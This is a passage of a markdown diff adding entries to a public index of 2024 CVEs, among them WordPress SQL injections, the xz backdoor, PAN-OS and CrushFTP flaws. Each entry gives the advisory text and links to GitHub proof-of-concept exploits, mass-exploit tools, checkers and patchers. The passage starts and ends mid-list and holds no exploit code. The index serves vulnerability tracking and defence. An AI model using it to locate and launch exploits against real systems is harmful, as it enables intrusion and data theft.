of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [herculeszxc/CVE-2024-2879](https://github.com/herculeszxc/CVE-2024-2879) + +### CVE-2024-2887 (2024-03-26) + +Type Confusion in WebAssembly in Google Chrome prior to 123.0.6312.86 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) + + +- [PumpkinBridge/Chrome-CVE-2024-2887-RCE-POC](https://github.com/PumpkinBridge/Chrome-CVE-2024-2887-RCE-POC) +- [rycbar77/CVE-2024-2887](https://github.com/rycbar77/CVE-2024-2887) + +### CVE-2024-2928 (2024-06-06) + +A Local File Inclusion (LFI) vulnerability was identified in mlflow/mlflow, specifically in version 2.9.2, which was fixed in version 2.11.3. This vulnerability arises from the application's failure to properly validate URI fragments for directory traversal sequences such as '../'. An attacker can exploit this flaw by manipulating the fragment part of the URI to read arbitrary files on the local file system, including sensitive files like '/etc/passwd'. The vulnerability is a bypass to a previous patch that only addressed similar manipulation within the URI's query string, highlighting the need for comprehensive validation of all parts of a URI to prevent LFI attacks. + + +- [nuridincersaygili/CVE-2024-2928](https://github.com/nuridincersaygili/CVE-2024-2928) + +### CVE-2024-2961 (2024-04-17) + +The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable.\n + + +- [mattaperkins/FIX-CVE-2024-2961](https://github.com/mattaperkins/FIX-CVE-2024-2961) +- [rvizx/CVE-2024-2961](https://github.com/rvizx/CVE-2024-2961) +- [ambionics/cnext-exploits](https://github.com/ambionics/cnext-exploits) +- [absolutedesignltd/iconvfix](https://github.com/absolutedesignltd/iconvfix) +- [exfil0/test_iconv](https://github.com/exfil0/test_iconv) +- [tnishiox/cve-2024-2961](https://github.com/tnishiox/cve-2024-2961) +- [kjdfklha/CVE-2024-2961_poc](https://github.com/kjdfklha/CVE-2024-2961_poc) + +### CVE-2024-2997 (2024-03-27) + +In Bdtask Multi-Store Inventory Management System bis 20240320 wurde eine problematische Schwachstelle ausgemacht. Hierbei betrifft es unbekannten Programmcode. Durch das Manipulieren des Arguments Category Name/Model Name/Brand Name/Unit Name mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [lfillaz/CVE-2024-2997](https://github.com/lfillaz/CVE-2024-2997) + +### CVE-2024-3094 (2024-03-29) + +Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. \r\nThrough a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library. + + +- [byinarie/CVE-2024-3094-info](https://github.com/byinarie/CVE-2024-3094-info) +- [FabioBaroni/CVE-2024-3094-checker](https://github.com/FabioBaroni/CVE-2024-3094-checker) +- [lypd0/CVE-2024-3094-Vulnerabity-Checker](https://github.com/lypd0/CVE-2024-3094-Vulnerabity-Checker) +- [OpensourceICTSolutions/xz_utils-CVE-2024-3094](https://github.com/OpensourceICTSolutions/xz_utils-CVE-2024-3094) +- [bioless/xz_cve-2024-3094_detection](https://github.com/bioless/xz_cve-2024-3094_detection) +- [Hacker-Hermanos/CVE-2024-3094_xz_check](https://github.com/Hacker-Hermanos/CVE-2024-3094_xz_check) +- [Fractal-Tess/CVE-2024-3094](https://github.com/Fractal-Tess/CVE-2024-3094) +- [wgetnz/CVE-2024-3094-check](https://github.com/wgetnz/CVE-2024-3094-check) +- [emirkmo/xz-backdoor-github](https://github.com/emirkmo/xz-backdoor-github) +- [ashwani95/CVE-2024-3094](https://github.com/ashwani95/CVE-2024-3094) +- [harekrishnarai/xz-utils-vuln-checker](https://github.com/harekrishnarai/xz-utils-vuln-checker) +- [teyhouse/CVE-2024-3094](https://github.com/teyhouse/CVE-2024-3094) +- [alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer](https://github.com/alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer) +- [Horizon-Software-Development/CVE-2024-3094](https://github.com/Horizon-Software-Development/CVE-2024-3094) +- [hazemkya/CVE-2024-3094-checker](https://github.com/hazemkya/CVE-2024-3094-checker) +- [lockness-Ko/xz-vulnerable-honeypot](https://github.com/lockness-Ko/xz-vulnerable-honeypot) +- [brinhosa/CVE-2024-3094-One-Liner](https://github.com/brinhosa/CVE-2024-3094-One-Liner) +- [isuruwa/CVE-2024-3094](https://github.com/isuruwa/CVE-2024-3094) +- [Yuma-Tsushima07/CVE-2024-3094](https://github.com/Yuma-Tsushima07/CVE-2024-3094) +- [jfrog/cve-2024-3094-tools](https://github.com/jfrog/cve-2024-3094-tools) +- [Simplifi-ED/CVE-2024-3094-patcher](https://github.com/Simplifi-ED/CVE-2024-3094-patcher) +- [gayatriracha/CVE-2024-3094-Nmap-NSE-script](https://github.com/gayatriracha/CVE-2024-3094-Nmap-NSE-script) +- [Mustafa1986/CVE-2024-3094](https://github.com/Mustafa1986/CVE-2024-3094) +- [MrBUGLF/XZ-Utils_CVE-2024-3094](https://github.com/MrBUGLF/XZ-Utils_CVE-2024-3094) +- [galacticquest/cve-2024-3094-detect](https://github.com/galacticquest/cve-2024-3094-detect) +- [mightysai1997/CVE-2024-3094-info](https://github.com/mightysai1997/CVE-2024-3094-info) +- [mightysai1997/CVE-2024-3094](https://github.com/mightysai1997/CVE-2024-3094) +- [mesutgungor/xz-backdoor-vulnerability](https://github.com/mesutgungor/xz-backdoor-vulnerability) +- [reuteras/CVE-2024-3094](https://github.com/reuteras/CVE-2024-3094) +- [amlweems/xzbot](https://github.com/amlweems/xzbot) +- [gustavorobertux/CVE-2024-3094](https://github.com/gustavorobertux/CVE-2024-3094) +- [ackemed/detectar_cve-2024-3094](https://github.com/ackemed/detectar_cve-2024-3094) +- [0xlane/xz-cve-2024-3094](https://github.com/0xlane/xz-cve-2024-3094) +- [dah4k/CVE-2024-3094](https://github.com/dah4k/CVE-2024-3094) +- [hackingetico21/revisaxzutils](https://github.com/hackingetico21/revisaxzutils) +- [devjanger/CVE-2024-3094-XZ-Backdoor-Detector](https://github.com/devjanger/CVE-2024-3094-XZ-Backdoor-Detector) +- [ScrimForever/CVE-2024-3094](https://github.com/ScrimForever/CVE-2024-3094) +- [pentestfunctions/CVE-2024-3094](https://github.com/pentestfunctions/CVE-2024-3094) +- [r0binak/xzk8s](https://github.com/r0binak/xzk8s) +- [przemoc/xz-backdoor-links](https://github.com/przemoc/xz-backdoor-links) +- [Security-Phoenix-demo/CVE-2024-3094-fix-exploits](https://github.com/Security-Phoenix-demo/CVE-2024-3094-fix-exploits) +- [MagpieRYL/CVE-2024-3094-backdoor-env-container](https://github.com/MagpieRYL/CVE-2024-3094-backdoor-env-container) +- [Bella-Bc/xz-backdoor-CVE-2024-3094-Check](https://github.com/Bella-Bc/xz-backdoor-CVE-2024-3094-Check) +- [TheTorjanCaptain/CVE-2024-3094-Checker](https://github.com/TheTorjanCaptain/CVE-2024-3094-Checker) +- [iheb2b/CVE-2024-3094-Checker](https://github.com/iheb2b/CVE-2024-3094-Checker) +- [felipecosta09/cve-2024-3094](https://github.com/felipecosta09/cve-2024-3094) +- [weltregie/liblzma-scan](https://github.com/weltregie/liblzma-scan) +- [crfearnworks/ansible-CVE-2024-3094](https://github.com/crfearnworks/ansible-CVE-2024-3094) +- [robertdebock/ansible-playbook-cve-2024-3094](https://github.com/robertdebock/ansible-playbook-cve-2024-3094) +- [badsectorlabs/ludus_xz_backdoor](https://github.com/badsectorlabs/ludus_xz_backdoor) +- [Juul/xz-backdoor-scan](https://github.com/Juul/xz-backdoor-scan) +- [fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-](https://github.com/fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-) +- [neuralinhibitor/xzwhy](https://github.com/neuralinhibitor/xzwhy) +- [AndreaCicca/Sicurezza-Informatica-Presentazione](https://github.com/AndreaCicca/Sicurezza-Informatica-Presentazione) +- [shefirot/CVE-2024-3094](https://github.com/shefirot/CVE-2024-3094) +- [DANO-AMP/CVE-2024-3094](https://github.com/DANO-AMP/CVE-2024-3094) +- [robertdfrench/ifuncd-up](https://github.com/robertdfrench/ifuncd-up) +- [XiaomingX/cve-2024-3094-xz-backdoor-exploit](https://github.com/XiaomingX/cve-2024-3094-xz-backdoor-exploit) + +### CVE-2024-3105 (2024-06-15) + +The Woody code snippets – Insert Header Footer Code, AdSense Ads plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.5.0 via the 'insert_php' shortcode. This is due to the plugin not restricting the usage of the functionality to high level authorized users. This makes it possible for authenticated attackers, with contributor-level access and above, to execute code on the server. + + +- [hunThubSpace/CVE-2024-3105-PoC](https://github.com/hunThubSpace/CVE-2024-3105-PoC) + +### CVE-2024-3116 (2024-04-04) + +pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE) vulnerability through the validate binary path API. This vulnerability allows attackers to execute arbitrary code on the server hosting PGAdmin, posing a severe risk to the database management system's integrity and the security of the underlying data.\n + + +- [TechieNeurons/CVE-2024-3116_RCE_in_pgadmin_8.4](https://github.com/TechieNeurons/CVE-2024-3116_RCE_in_pgadmin_8.4) + +### CVE-2024-3177 (2024-04-22) + +A security issue was discovered in Kubernetes where users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using containers, init containers, and ephemeral containers with the envFrom field populated. The policy ensures pods running with a service account may only reference secrets specified in the service account’s secrets field. Kubernetes clusters are only affected if the ServiceAccount admission plugin and the kubernetes.io/enforce-mountable-secrets annotation are used together with containers, init containers, and ephemeral containers with the envFrom field populated. + + +- [Cgv-Dev/Metasploit-Module-TFM](https://github.com/Cgv-Dev/Metasploit-Module-TFM) + +### CVE-2024-3183 (2024-06-12) + +A vulnerability was found in FreeIPA in a way when a Kerberos TGS-REQ is encrypted using the client’s session key. This key is different for each new session, which protects it from brute force attacks. However, the ticket it contains is encrypted using the target principal key directly. For user principals, this key is a hash of a public per-principal randomly-generated salt and the user’s password.\r\n\r\nIf a principal is compromised it means the attacker would be able to retrieve tickets encrypted to any principal, all of them being encrypted by their own key directly. By taking these tickets and salts offline, the attacker could run brute force attacks to find character strings able to decrypt tickets when combined to a principal salt (i.e. find the principal’s password). + + +- [Cyxow/CVE-2024-3183-POC](https://github.com/Cyxow/CVE-2024-3183-POC) + +### CVE-2024-3217 (2024-04-05) + +The WP Directory Kit plugin for WordPress is vulnerable to SQL Injection via the 'attribute_value' and 'attribute_id' parameters in all versions up to, and including, 1.3.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [BassamAssiri/CVE-2024-3217-POC](https://github.com/BassamAssiri/CVE-2024-3217-POC) + +### CVE-2024-3272 (2024-04-04) + +Eine Schwachstelle wurde in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L bis 20240403 entdeckt. Sie wurde als sehr kritisch eingestuft. Betroffen davon ist ein unbekannter Prozess der Datei /cgi-bin/nas_sharing.cgi der Komponente HTTP GET Request Handler. Mit der Manipulation des Arguments user mit der Eingabe messagebus mit unbekannten Daten kann eine hard-coded credentials-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [nickswink/D-Link-NAS-Devices-Unauthenticated-RCE](https://github.com/nickswink/D-Link-NAS-Devices-Unauthenticated-RCE) +- [aliask/dinkleberry](https://github.com/aliask/dinkleberry) + +### CVE-2024-3273 (2024-04-04) + +Es wurde eine Schwachstelle in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L bis 20240403 gefunden. Sie wurde als kritisch eingestuft. Betroffen hiervon ist ein unbekannter Ablauf der Datei /cgi-bin/nas_sharing.cgi der Komponente HTTP GET Request Handler. Durch die Manipulation des Arguments system mit unbekannten Daten kann eine command injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [Chocapikk/CVE-2024-3273](https://github.com/Chocapikk/CVE-2024-3273) +- [adhikara13/CVE-2024-3273](https://github.com/adhikara13/CVE-2024-3273) +- [yarienkiva/honeypot-dlink-CVE-2024-3273](https://github.com/yarienkiva/honeypot-dlink-CVE-2024-3273) +- [K3ysTr0K3R/CVE-2024-3273-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-3273-EXPLOIT) +- [ThatNotEasy/CVE-2024-3273](https://github.com/ThatNotEasy/CVE-2024-3273) +- [LeopoldSkell/CVE-2024-3273](https://github.com/LeopoldSkell/CVE-2024-3273) +- [mrrobot0o/CVE-2024-3273-](https://github.com/mrrobot0o/CVE-2024-3273-) +- [OIivr/Turvan6rkus-CVE-2024-3273](https://github.com/OIivr/Turvan6rkus-CVE-2024-3273) +- [X-Projetion/CVE-2024-3273-D-Link-Remote-Code-Execution-RCE](https://github.com/X-Projetion/CVE-2024-3273-D-Link-Remote-Code-Execution-RCE) + +### CVE-2024-3293 (2024-04-23) + +The rtMedia for WordPress, BuddyPress and bbPress plugin for WordPress is vulnerable to blind SQL Injection via the rtmedia_gallery shortcode in all versions up to, and including, 4.6.18 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [truonghuuphuc/CVE-2024-3293-Poc](https://github.com/truonghuuphuc/CVE-2024-3293-Poc) + +### CVE-2024-3393 (2024-12-27) + +A Denial of Service vulnerability in the DNS Security feature of Palo Alto Networks PAN-OS software allows an unauthenticated attacker to send a malicious packet through the data plane of the firewall that reboots the firewall. Repeated attempts to trigger this condition will cause the firewall to enter maintenance mode. + + +- [FelixFoxf/-CVE-2024-3393](https://github.com/FelixFoxf/-CVE-2024-3393) + +### CVE-2024-3400 (2024-04-12) + +A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.\n\nCloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability. + + +- [Yuvvi01/CVE-2024-3400](https://github.com/Yuvvi01/CVE-2024-3400) +- [CerTusHack/CVE-2024-3400-PoC](https://github.com/CerTusHack/CVE-2024-3400-PoC) +- [0x0d3ad/CVE-2024-3400](https://github.com/0x0d3ad/CVE-2024-3400) +- [FoxyProxys/CVE-2024-3400](https://github.com/FoxyProxys/CVE-2024-3400) +- [momika233/CVE-2024-3400](https://github.com/momika233/CVE-2024-3400) +- [MrR0b0t19/CVE-2024-3400](https://github.com/MrR0b0t19/CVE-2024-3400) +- [MurrayR0123/CVE-2024-3400-Compromise-Checker](https://github.com/MurrayR0123/CVE-2024-3400-Compromise-Checker) +- [AdaniKamal/CVE-2024-3400](https://github.com/AdaniKamal/CVE-2024-3400) +- [LoanVitor/CVE-2024-3400-](https://github.com/LoanVitor/CVE-2024-3400-) +- [h4x0r-dz/CVE-2024-3400](https://github.com/h4x0r-dz/CVE-2024-3400) +- [W01fh4cker/CVE-2024-3400-RCE-Scan](https://github.com/W01fh4cker/CVE-2024-3400-RCE-Scan) +- [CONDITIONBLACK/CVE-2024-3400-POC](https://github.com/CONDITIONBLACK/CVE-2024-3400-POC) +- [Chocapikk/CVE-2024-3400](https://github.com/Chocapikk/CVE-2024-3400) +- [ihebski/CVE-2024-3400](https://github.com/ihebski/CVE-2024-3400) +- [index2014/CVE-2024-3400-Checker](https://github.com/index2014/CVE-2024-3400-Checker) +- [ZephrFish/CVE-2024-3400-Canary](https://github.com/ZephrFish/CVE-2024-3400-Canary) +- [ak1t4/CVE-2024-3400](https://github.com/ak1t4/CVE-2024-3400) +- [retkoussa/CVE-2024-3400](https://github.com/retkoussa/CVE-2024-3400) +- [schooldropout1337/CVE-2024-3400](https://github.com/schooldropout1337/CVE-2024-3400) +- [hahasagined/CVE-2024-3400](https://github.com/hahasagined/CVE-2024-3400) +- [codeblueprint/CVE-2024-3400](https://github.com/codeblueprint/CVE-2024-3400) +- [swaybs/CVE-2024-3400](https://github.com/swaybs/CVE-2024-3400) +- [sxyrxyy/CVE-2024-3400-Check](https://github.com/sxyrxyy/CVE-2024-3400-Check) +- [Ravaan21/CVE-2024-3400](https://github.com/Ravaan21/CVE-2024-3400) +- [tfrederick74656/cve-2024-3400-poc](https://github.com/tfrederick74656/cve-2024-3400-poc) +- [pwnj0hn/CVE-2024-3400](https://github.com/pwnj0hn/CVE-2024-3400) +- [HackingLZ/panrapidcheck](https://github.com/HackingLZ/panrapidcheck) +- [Kr0ff/cve-2024-3400](https://github.com/Kr0ff/cve-2024-3400) +- [zam89/CVE-2024-3400-pot](https://github.com/zam89/CVE-2024-3400-pot) +- [terminalJunki3/CVE-2024-3400-Checker](https://github.com/terminalJunki3/CVE-2024-3400-Checker) +- [0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection](https://github.com/0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection) +- [marconesler/CVE-2024-3400](https://github.com/marconesler/CVE-2024-3400) +- [andrelia-hacks/CVE-2024-3400](https://github.com/andrelia-hacks/CVE-2024-3400) +- [tk-sawada/IPLineFinder](https://github.com/tk-sawada/IPLineFinder) +- [iwallarm/cve-2024-3400](https://github.com/iwallarm/cve-2024-3400) +- [workshop748/CVE-2024-3400](https://github.com/workshop748/CVE-2024-3400) +- [nanwinata/CVE-2024-3400](https://github.com/nanwinata/CVE-2024-3400) + +### CVE-2024-3435 (2024-05-16) + +A path traversal vulnerability exists in the 'save_settings' endpoint of the parisneo/lollms-webui application, affecting versions up to the latest release before 9.5. The vulnerability arises due to insufficient sanitization of the 'config' parameter in the 'apply_settings' function, allowing an attacker to manipulate the application's configuration by sending specially crafted JSON payloads. This could lead to remote code execution (RCE) by bypassing existing patches designed to mitigate such vulnerabilities. + + +- [ymuraki-csc/cve-2024-3435](https://github.com/ymuraki-csc/cve-2024-3435) + +### CVE-2024-3495 (2024-05-22) + +The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [truonghuuphuc/CVE-2024-3495-Poc](https://github.com/truonghuuphuc/CVE-2024-3495-Poc) +- [zomasec/CVE-2024-3495-POC](https://github.com/zomasec/CVE-2024-3495-POC) + +### CVE-2024-3552 (2024-06-13) + +The Web Directory Free WordPress plugin before 1.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection with different techniques like UNION, Time-Based and Error-Based. + + +- [truonghuuphuc/CVE-2024-3552-Poc](https://github.com/truonghuuphuc/CVE-2024-3552-Poc) + +### CVE-2024-3596 (2024-07-09) + +RADIUS Protocol under RFC 2865 is susceptible to forgery attacks by a local attacker who can modify any valid Response (Access-Accept, Access-Reject, or Access-Challenge) to any other response using a chosen-prefix collision attack against MD5 Response Authenticator signature. + + +- [alperenugurlu/CVE-2024-3596-Detector](https://github.com/alperenugurlu/CVE-2024-3596-Detector) + +### CVE-2024-3656 (2024-10-09) + +A flaw was found in Keycloak. Certain endpoints in Keycloak's admin REST API allow low-privilege users to access administrative functionalities. This flaw allows users to perform actions reserved for administrators, potentially leading to data breaches or system compromise. + + +- [h4x0r-dz/CVE-2024-3656](https://github.com/h4x0r-dz/CVE-2024-3656) + +### CVE-2024-3690 (2024-04-12) + +In PHPGurukul Small CRM 3.0 wurde eine kritische Schwachstelle entdeckt. Hierbei betrifft es unbekannten Programmcode der Komponente Change Password Handler. Durch Beeinflussen mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [taeseongk/CVE-2024-3690](https://github.com/taeseongk/CVE-2024-3690) + +### CVE-2024-3806 (2024-05-09) + +The Porto theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 7.1.0 via the 'porto_ajax_posts' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included. + + +- [truonghuuphuc/CVE-2024-3806-AND-CVE-2024-3807-Poc](https://github.com/truonghuuphuc/CVE-2024-3806-AND-CVE-2024-3807-Poc) +- [RandomRobbieBF/CVE-2024-3806](https://github.com/RandomRobbieBF/CVE-2024-3806) + +### CVE-2024-3867 (2024-04-16) + +The archive-tainacan-collection theme for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in version 2.7.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + + +- [c4cnm/CVE-2024-3867](https://github.com/c4cnm/CVE-2024-3867) + +### CVE-2024-3922 (2024-06-13) + +The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [truonghuuphuc/CVE-2024-3922-Poc](https://github.com/truonghuuphuc/CVE-2024-3922-Poc) + +### CVE-2024-4040 (2024-04-22) + +A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.\n + + +- [airbus-cert/CVE-2024-4040](https://github.com/airbus-cert/CVE-2024-4040) +- [tucommenceapousser/CVE-2024-4040-Scanner](https://github.com/tucommenceapousser/CVE-2024-4040-Scanner) +- [rbih-boulanouar/CVE-2024-4040](https://github.com/rbih-boulanouar/CVE-2024-4040) +- [Mufti22/CVE-2024-4040](https://github.com/Mufti22/CVE-2024-4040) +- [Stuub/CVE-2024-4040-SSTI-LFI-PoC](https://github.com/Stuub/CVE-2024-4040-SSTI-LFI-PoC) +- [0xN7y/CVE-2024-4040](https://github.com/0xN7y/CVE-2024-4040) +- [Praison001/CVE-2024-4040-CrushFTP-server](https://github.com/Praison001/CVE-2024-4040-CrushFTP-server) +- [Mohammaddvd/CVE-2024-4040](https://github.com/Mohammaddvd/CVE-2024-4040) +- [jakabakos/CVE-2024-4040-CrushFTP-File-Read-vulnerability](https://github.com/jakabakos/CVE-2024-4040-CrushFTP-File-Read-vulnerability) +- [gotr00t0day/CVE-2024-4040](https://github.com/gotr00t0day/CVE-2024-4040) +- [1ncendium/CVE-2024-4040](https://github.com/1ncendium/CVE-2024-4040) +- [olebris/CVE-2024-4040](https://github.com/olebris/CVE-2024-4040) +- [entroychang/CVE-2024-4040](https://github.com/entroychang/CVE-2024-4040) +- [safeer-accuknox/CrushFTP-cve-2024-4040-poc](https://github.com/safeer-accuknox/CrushFTP-cve-2024-4040-poc) +- [geniuszly/GenCrushSSTIExploit](https://github.com/geniuszly/GenCrushSSTIExploit) +- [rahisec/CVE-2024-4040](https://github.com/rahisec/CVE-2024-4040) + +### CVE-2024-4231 (2024-05-10) + +This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version : v3.2.02) due to presence of root terminal access on a serial interface without proper access control. An attacker with physical access could exploit this by identifying UART pins and accessing the root shell on the vulnerable system.\n\nSuccessful exploitation of this vulnerability could allow the attacker to access the sensitive information on the targeted system. + + +- [Redfox-Secuirty/Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231](https://github.com/Redfox-Secuirty/Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231) + +### CVE-2024-4232 (2024-05-10) + +This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version : v3.2.02) due to lack of encryption or hashing in storing of passwords within the router's firmware/ database. An attacker with physical access could exploit this by extracting the firmware and reverse engineer the binary data to access the plaintext passwords on the vulnerable system.\n\nSuccessful exploitation of this vulnerability could allow the attacker to gain unauthorized access to the targeted system. + + +- [Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232](https://github.com/Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232) +- [Redfox-Secuirty/Digisol-DG--GR1321-s-Password-Storage-in-Plaintext--CVE-2024-4232](https://github.com/Redfox-Secuirty/Digisol-DG--GR1321-s-Password-Storage-in-Plaintext--CVE-2024-4232) + +### CVE-2024-4295 (2024-06-05) + +The Email Subscribers by Icegram Express plugin for WordPress is vulnerable to SQL Injection via the ‘hash’ parameter in all versions up to, and including, 5.7.20 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [truonghuuphuc/CVE-2024-4295-Poc](https://github.com/truonghuuphuc/CVE-2024-4295-Poc) +- [cve-2024/CVE-2024-4295-Poc](https://github.com/cve-2024/CVE-2024-4295-Poc) + +### CVE-2024-4320 (2024-06-06) + +A remote code execution (RCE) vulnerability exists in the '/install_extension' endpoint of the parisneo/lollms-webui application, specifically within the `@router.post("/install_extension")` route handler. The vulnerability arises due to improper handling of the `name` parameter in the `ExtensionBuilder().build_extension()` method, which allows for local file inclusion (LFI) leading to arbitrary code execution. An attacker can exploit this vulnerability by crafting a malicious `name` parameter that causes the server to load and execute a `__init__.py` file from an arbitrary location, such as the upload directory for discussions. This vulnerability affects the latest version of parisneo/lollms-webui and can lead to remote code execution without requiring user interaction, especially when the application is exposed to an external endpoint or operated in headless mode. + + +- [bolkv/CVE-2024-4320](https://github.com/bolkv/CVE-2024-4320) + +### CVE-2024-4323 (2024-05-20) + +A memory corruption vulnerability in Fluent Bit versions 2.0.7 thru 3.0.3. This issue lies in the embedded http server’s parsing of trace requests and may result in denial of service conditions, information disclosure, or remote code execution. + + +- [skilfoy/CVE-2024-4323-Exploit-POC](https://github.com/skilfoy/CVE-2024-4323-Exploit-POC) +- [d0rb/CVE-2024-4323](https://github.com/d0rb/CVE-2024-4323) +- [yuansec/CVE-2024-4323-dos_poc](https://github.com/yuansec/CVE-2024-4323-dos_poc) + +### CVE-2024-4351 (2024-05-16) + +The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on the 'authenticate' function in all versions up to, and including, 2.7.0. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to gain control of an existing administrator account. + + +- [ZSECURE/CVE-2024-4351](https://github.com/ZSECURE/CVE-2024-4351) + +### CVE-2024-4352 (2024-05-16) + +The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on the 'get_calendar_materials' function. The plugin is also vulnerable to SQL Injection via the ‘year’ parameter of that function due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [truonghuuphuc/CVE-2024-4352-Poc](https://github.com/truonghuuphuc/CVE-2024-4352-Poc) + +### CVE-2024-4358 (2024-05-29) + +In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability. + + +- [sinsinology/CVE-2024-4358](https://github.com/sinsinology/CVE-2024-4358) +- [RevoltSecurities/CVE-2024-4358](https://github.com/RevoltSecurities/CVE-2024-4358) +- [Harydhk7/CVE-2024-4358](https://github.com/Harydhk7/CVE-2024-4358) +- [Sk1dr0wz/CVE-2024-4358_Mass_Exploit](https://github.com/Sk1dr0wz/CVE-2024-4358_Mass_Exploit) +- [verylazytech/CVE-2024-4358](https://github.com/verylazytech/CVE-2024-4358) +- [gh-ost00/CVE-2024-4358](https://github.com/gh-ost00/CVE-2024-4358) + +### CVE-2024-4367 (2024-05-14) + +A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. This vulnerability affects Firefox < 126, Firefox ESR < 115.11, and Thunderbird < 115.11. + + +- [LOURC0D3/CVE-2024-4367-PoC](https://github.com/LOURC0D3/CVE-2024-4367-PoC) +- [s4vvysec/CVE-2024-4367-POC](https://github.com/s4vvysec/CVE-2024-4367-POC) +- [spaceraccoon/detect-cve-2024-4367](https://github.com/spaceraccoon/detect-cve-2024-4367) +- [clarkio/pdfjs-vuln-demo](https://github.com/clarkio/pdfjs-vuln-demo) +- [avalahEE/pdfjs_disable_eval](https://github.com/avalahEE/pdfjs_disable_eval) +- [Zombie-Kaiser/cve-2024-4367-PoC-fixed](https://github.com/Zombie-Kaiser/cve-2024-4367-PoC-fixed) +- [snyk-labs/pdfjs-vuln-demo](https://github.com/snyk-labs/pdfjs-vuln-demo) +- [UnHackerEnCapital/PDFernetRemotelo](https://github.com/UnHackerEnCapital/PDFernetRemotelo) +- [Masamuneee/CVE-2024-4367-Analysis](https://github.com/Masamuneee/CVE-2024-4367-Analysis) +- [pedrochalegre7/CVE-2024-4367-pdf-sample](https://github.com/pedrochalegre7/CVE-2024-4367-pdf-sample) +- 